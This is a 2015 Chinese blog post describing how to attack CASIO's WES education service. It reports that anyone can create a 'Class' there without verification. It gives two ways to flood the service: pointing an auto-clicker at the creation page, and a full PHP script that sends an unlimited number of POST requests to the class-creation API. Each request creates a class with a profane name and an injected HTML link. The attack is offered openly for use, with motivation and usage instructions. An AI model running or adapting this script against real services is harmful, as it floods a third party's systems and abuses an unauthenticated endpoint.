HBTech's Blog
论如何攻击CASIO的WES服务

众所周知,CASIO在去年就发布了WES服务,但就是没有为中国用户服务。

我司CADUO在今年发布CADUO WES for Chinese 。今年10月份,CASIO WES 发布Online Sharing,通过名为Class的玩意在课堂上共享学生们的探究结果。

然而,这玩意(Class)的创建有漏洞,任何人都可以创建一个Class而不需要任何验证。

为了给CASIO一个教训(为啥没有CASIO WES for Chinese)以及愉快的玩耍CASIO,我找到了两种攻击方法,可以疯狂创建Class,一种通过按键精灵,另一种是基于PHP编写了一个可以无限向CASIO POST的程序,特此放出源码。

按键精灵版

用一个可以拦截弹出窗口的浏览器(例如Chrome)打开http://wes.casio.com/en/class/

看到那个大大的了吗?下载一个按键精灵,或者鼠标连点器,对准狂按

效果如图所示:/wp-content/uploads/2015/11/2331.png

PHP版

使用此方法需要一个PHP服务器,优点是可以设置监控,24小时攻击

源码如下

<?php
header("Content-type: application/json");
function post($url, $data){ 
        $postdata = http_build_query($data);
        $opts = array('http' =>
            array(
                'method'  => 'POST',
                'header'  => 'Content-type: application/x-www-form-urlencoded',
                'content' => $postdata
                )
            );
    $context = stream_context_create($opts);
    $result = file_get_contents($url, false, $context);
    return $result;
}
function fuck($times){
    $i='1';
    do {
        echo post('http://wes.casio.com/class_api/class.php', 
            array(
                'api' => 'class_create',
                'class_name' => 'Fuck CASIO',
                'class_description' => 'Fuck CASIO <a href="http://tieba.baidu.com/f?kw=fx-es(ms)">By fx-es(ms) Bar</a>')) . "\n";
        $i++;
    }while ($i < = $times);
    }
fuck($_GET['fuck']) ;
?>

使用方法:复制保存为一个.php文件(绝对不能用记事本保存,可以用Notepad++等),若文件名为 fuck.php ,访问fuck.php?fuck=攻击次数

注意:根据CASIO说法,一个Class超过一星期不访问就会被删除!

目前是原样JSON输出,下一步就是解析JSON,提取Class Number

忘了说运行后会向CASIO发送的信息是:创建Class名为“Fuck CASIO”,Class描述为Fuck CASIO <a href=”http://tieba.baidu.com/f?kw=fx-es(ms)”>By fx-es(ms) Bar</a>的一个Class

示例页面:
/wp-content/uploads/2015/11/666.png

HBTech's Blog

论如何攻击CASIO的WES服务
众所周知,CASIO在去年就发布了WES服务,但就是没有为中国用户服务。 我司CADUO在今年发布CADUO WES for Chinese 。今年10月份,CASIO WES 发布Online Sharing,通过名为Class的玩意在…
扫描二维码继续阅读
2015-11-26